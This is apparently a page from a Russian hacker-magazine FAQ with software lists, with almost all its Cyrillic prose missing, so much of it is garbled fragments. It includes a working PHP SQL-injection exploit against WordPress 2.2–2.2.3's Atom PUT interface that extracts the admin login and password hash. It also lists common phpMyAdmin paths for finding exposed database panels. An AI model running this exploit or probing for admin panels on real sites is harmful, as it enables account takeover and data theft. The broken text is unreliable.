5. !
.
. .
, ,
.
FAQ UNITED:
Q: Google PR, .
Alexa rank?
A: ! Alexa.com
XML- ,
, , rank,
(, ,
..).
rank:
<?php
// Query the Alexa XML data service and return the rank reported for $url.
function alexarank($url, $ip = '127.0.0.1')
{
    // Strip the scheme so that only the host/path is sent
    $url = preg_replace('/https?:\/\//i', '', $url);
    // Pseudo-random client identifier in the format the service expects
    $uid = sprintf('2007%02d%02d%02d%02d%02d',
        rand(1,12), rand(1,28), rand(1,24), rand(1,60), rand(1,60));
    $alexa_url = 'http://xml.alexa.com/data?cli=10&dat=nsa&ver=quirksearchstatus&uid=' . $uid .
        '&userip=' . $ip . '&url=' . urlencode($url);
    $content = file_get_contents($alexa_url);
    // The rank is carried in the TEXT attribute of the POPULARITY element
    if (preg_match('/<POPULARITY URL="[^"]+" TEXT="(\d+)"\/>/i', $content, $matches))
    {
        return trim($matches[1]);
    }
    return 'Unknown';
}
print alexarank('google.com');
?>
XML-
Alexa.
Q: PHP- Alexa rank?
?
, :
<?php
$netcraft = file_get_contents('http://searchdns.netcraft.com/?position=limited&host=google.com');
preg_match('|<a href="http://uptime\.netcraft\.com/up/graph/\?host=[a-z0-9\._-]+">(.+?)</a>|i', $netcraft, $os_arr);
print $os_arr[1];
?>
, Nmap (, , - 10 ,
. Step).
A: ,
alexa.com ( ,
),
- Google PR/Alexa rank; , http://extra-traffic.com/pra_checker.htm.ru.htm.
,
15 .
Q: PHP , ?
A: -
netcraft.com,
Q:
- /.
, ?
A:
http://whitepages.anywho.com,
:).
, :
1. Last Name (Required)
, , Jackson (RIP! . );
2. State
, , CA;
3. Find A Person;
4. , , :
3. <Enter>
:)
(site:site.com
phpmyadmin), robots.txt .
Q: 100%-
A L Jackson
Some address
Some city, CA some zip code
(408) some phone number
Q: ,
A: ,
mysql?
d_x Forum
Detector. :
A: ! ,
Q: ,
?
A: whoer.net -
. (
whoer.net/ext),
:
1. IP Address ( , IP,
, ip ,
whois).
2. Location (, , , ,
, /,
).
3. Time (, , , UTC, GMT, ).
4. HTTP Headers ( ,
).
5. Scripts ( ActiveX, VBScript,
JavaScript, Java).
6. , (,
).
7. Navigator ( ).
8. Plugins (, ).
, -
. , /
/VPN.
Q: -
?
A: DeeIP, WHB, -
. :
1. ,
,
;
2.
javascript-:
JavaScript: this.disabled=true; document.regMe.submit();
(
IPB, phpBB, vBulletin, MyBB)
(, )
PR
, socks5, , socks5
2 :
1.
mysql -h[host] -u[user] -p[pass] [base] < dump.sql
2.
mysqldump -h[host] -u[user] -p[pass] [base] > dump.sql
. ,
:
mysqldump -h[host] -u[user] -p[pass] [base] | gzip > base.sql.gz
: http://forum.antichat.ru/thread114708.html.
mysql?
Q:
A:
phpMyAdmin?
PHP-
Sypex Dumper (sypex.net/products/dumper), , ,
- ,
,
,
.
:
;
;
;
;
;
;
.
Q: -
PhpMyAdmin !
A: -
,
phpmyadmin:
/phpMyAdmin-x.x.x/ ( x.x.x
)
/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmi/
, phpmyadmin
Q:
WordPress. - .
A: :).
sql- ,
Alex Concha
buayacorp.com.
, ./wp-includes/atomlib.php
:
function xml_escape($string)
{
    return str_replace(
        array('&','"',"'",'<','>'),
        array('&amp;','&quot;','&apos;','&lt;','&gt;'),
        $string );
}
, ,
,
PUT atom-,
\ ( WordPress, ,
GET, POST,
COOKIE, SERVER ).
,
, 2.2
2.7.1,
,
.
2.2 2.2.3 edit_posts (
,
):
<?php
$site='lamer.com';
$path='/wp223/wp-app.php?action=/
post/1'; //
$user='editor'; //
$passwd='editor'; //
$auth=base64_
encode($user.":".$passwd);
$fp = fsockopen($site, 80, $errno,
$errstr, 30);
$data=<feed>
<entry>
<id>http://lamer.com/
wp223/2009/03/01/hello-world/</id>
<title type="html">test\</
title>
<summary type="html">,post_
name=(select concat(user_
login,0x3a,user_pass) from wp_users
where ID=1) where id=1/*</summary>
</entry>
</feed>';
$out = "PUT $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-Type: application/
atom+xml\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: Opera\r\n";
$out .= "Authorization: Basic
$auth\r\n";
$out .= "Content-Length:
".strlen($data)."\r\n\r\n";
fwrite($fp, $out.$data);
fclose($fp);
?>
http://lamer.
com/?p=[ID ]. @test, post_excerpt =,
- :
http://lamer/wp222/2009/03/01/admin:21232f297a57a5a743894a0e4a801fc3/ (-,
).
Q: , ,
.mp4. ,
,
.
90 .
(, ,
)?
A: :).
- .
( lossless).
VirtualDub
(www.virtualdub.org). :
1. File Open
video File;
2. Video Filters, ( Add) Rotate.
3. : left
by 90 right by 90.
.
. Video
Full processing mode.
Video
compression.
4. File Save as
AVI.
5. ,
AVI-.
Picasa (picasa.google.com/intl/ru),
.
Q: VMWare
Fedora 10 (iso )
.
chaosreader
(chaosreader.sourceforge.net),
Perl. -
tcpdump snoff,
HTML- telnet-,
, FTP,
http- (HTML-,
GIF JPEG) .. ..
pcapsipdump (sourceforge.net/projects/
psipdump) ,
SIP-, .
SIP-
.
Smbsniff (http://www.hsc.fr/ressources/outils/smbsniff/index.html.en) , SMB/
CIFS. , ,
CIFS. , ,
.
,
, Tcpreplay (tcpreplay.synfin.net), .
tcprewrite , .
tcpreplay
: tcpreplay --intf1=eth0 sample.pcap.
. , Up <Alt+F2>.
?
A: , . -
/etc/vmware/config:
xkeymap.nokeycodeMap = true
Q: tcpdump (tcpdump,
Wireshark, Kismet ) ?
A: ,
Wireshark
(www.wireshark.org), .
Q: 2-hop SSH. -
SSH Proxy?
A: , serv1,
serv1.mydomain.com.
serv2 192.168.1.100,
, serv1,
.
locuser,
remuser.
SSH-, ~/.ssh/config :
Host *
    ForwardAgent yes
Host serv1
    HostName alpha.pupkin.net
    User locuser
Host serv2
    HostName 192.168.1.100
    User remuser
    ProxyCommand ssh serv1 nc %h %p
?
serv1 serv2
. SSH , ssh alpha.
ssh beta
serv2, alpha.
netcat
(netcat.sourceforge.net).
SSH-
PuTTY
PuTTY Connection Manager
MobaSSH
freeSSHd
WinSCP
Tera Term
WiSSH
>Net
BluetoothView 1.30
Gmail Manager 0.5.7.2
HTTrack Website Copier 3.43
Psi for Windows 0.13
uTorrent 1.8.3
>Misc
7stacks 1.2
AutoHotkey 1.0.48.03
Ditto 3.16.7
f.lux
High Sign Alpha Preview 2
MyTourbook 9.07
Nexus 9.7b2
Stickies 6.7a
>Development
HelpNDoc 2.1
IronRuby 0.9
JProfiler 5.2
Microsoft Expression Blend 3 +
SketchFlow
Microsoft Silverlight 3 SDK
Microsoft Silverlight 3 Tools for
Visual Studio 2008 SP1
MySQL Workbench 5.2 Alpha
Silverlight 3 Toolkit July 2009
Translate.Net 0.1.3493
WinHex 15.4
>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns for Windows v9.5
DAEMON Tools Lite 4.30.4
Download Master 5.5.12.1172
FarPowerPack 1.15
FileZilla Client 3.2.7-rc1
K-Lite Mega Codec Pack 5.0
Miranda IM 0.8.3
Mozilla Firefox 3.5.2
Notepad++ 5.4.5
Opera 9.64
PuTTY 0.60
QIP 2005 Build 8094
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
Xakep CD DataSaver 5.2
XnView 1.96.2
Project Voldemort
Apache CouchDB
Redis
MemcacheDB
>>UNIX
>Devel
Adobe AIR 1.5.2
Aptana Studio 1.5
Bouml 4.13.1
fingerprint'
Nmap
p0f v2
THC-Amap
httprint
NetworkMiner
ike-scan
Xprobe2
Satori
SinFP
>Security
Aircrack-ng 1.0RC4
bsqlbf 2.3
Charles 3.3.1
Damn Vulnerable Web App 1.0.4
dhcdrop 0.4
dradis 2.2
GFI LANguard 9
Kon-Boot 1.1
Microsoft KAPIMON 5.1
ophcrack 3.3.1
Pangolin 2.5.2.975
Privoxy2 3.0.14
ProxyStrike 2.1
SCRT Webshag 1.10
Sipflanker 1.5beta
sqlmap 0.7
Tor IM Browser Bundle 1.2.6
Watcher 1.2.1
Wireshark 1.2.1
>System
Apache HTTP Server Version 2.2
Agnitum Outpost Firewall Free 2009
AVG Anti-Virus Free Edition 8.5
DiskDigger 0.8.3
HDDScan 3.2
HWiNFO32 3.10
MyDefrag 4.1.2
Outpost Firewall Pro 2009
Process Lasso 3.63b
R-Studio 5.00
UNetbootin 3.57
USB-Drive Protector 1.02
VirtualBox 3.0.2
Xming 7.4.0.3
>Multimedia
ImgBurn 2.5
MediaInfo 0.7.9
MetatOGGer 3.9.2.0
Nero Free 9.4.12.3
PDFTools 1.3
Shup 0.27
SmillaEnlarger 0.8
STDU Viewer 1.5.275
VirtualDub 1.9.4
VLC (VideoLAN) 1.0.1
>Security
Aircrack-ng 1.0rc4
beholder 0.8.6
dhcdrop 0.4
Dradis 2.2.0
Grendel Scan 1.0
Justniffer 0.5.6
Middler 1.0
mysqltr4cker 1.2
Nmap 5.0
nschaind 0.3
packet-o-matic 20090726
PHPIDS 0.6
Privoxy 3.0.14b
sipflanker 1.5beta
sshdautoban 0.75
Tor 0.2.0.35
Vidalia 0.1.15
VoIPER 0.0.7
WEPBuster 1.0
Yaptest 0.2.1
>X-Distr
Linux From Scratch 6.4
Solaris 10
>System
ATI 9.7
Collectd 4.7.2
JPC
Linux Kernel 2.6.30.4
LVM2 2.02.50
Man pages 3.22
nVidia 185.18.29
quagga 0.99.14
Safecopy 1.5
Sudo 1.7.2
Virtualbox 3.0.2
Wine 1.1.26
Xf86-video-intel 2.8.0
>Net
Adobe Flash Player 10.0.32.18
aria2 1.5.1
Arora 0.8
Fetchmail 6.3.10
Flock 2.5.1
gPodder 0.17.0
KMess 2.0
Liferea 1.6
Linuxdcpp 1.0.3
Lynx 2.8.7
Minitube 0.5
Miro 2.5
Mozilla Firefox 3.5.1
Opera 9.64
Psi 0.13
Putty 0.60
qutIM 0.2 beta2
Sylpheed 2.7
WeeChat 0.3.0 rc2
Xchat 2.8.6
>Games
ManiaDrive 1.2
>Server
Apache 2.2.12
Asterisk 1.4.26
BIND 9.4.3 P3
Cups 1.4rc1
Dovecot 1.2.2
HAproxy 1.3.19
Hybrid 7.2.3
IRC Services 5.1.9
Kamailio 1.5.2
NFS Ganesha 0.99.57
OpenDS 2.0
OpenLDAP 2.4.17
OpenSSH 5.2
OpenVPN 2.1rc19
Prosody 0.5.1
rsyslog 4.5.1
Samba 3.4
Squid 3.0.STABLE17
Xorg server 1.6.3
Bugzilla 3.4
Bviplus 0.5.2
Clutter 1.0.0
Django 1.1
gtk+ 2.17.6
GtkHTML 3.26.3
jEdit 4.2
MILEPOST GCC 4.4.0
MPS 1.0
Nasm 2.07
pgAdmin 1.10.0
Scons 1.2.0
SmartCVS 7.0.9
SWIG 1.3.39
Unique 0.18
Zend Framework 1.9.0
Zend Studio 7.0
HTTP://WWW2
.
- . ,
, .
What The Font ,
, .
. , ,
-
-.
Firefox
FIREFOX BUILDER
ffbuilder.ru
,
Firefox, .
. : ffbuilder.ru . : , ,
!
PHOTOSHOP ONLINE
www.photoshop.com
Adobe -
Photoshop. , ,
. ,
, ,
Photoshop online. ,
.
Linux-
SUSE STUDIO
susestudio.com
!
- .
JeOS, openSUSE SUSE Linux Enterprise,
,
.
: ISO-, LiveCD,
Xen VMware.
, !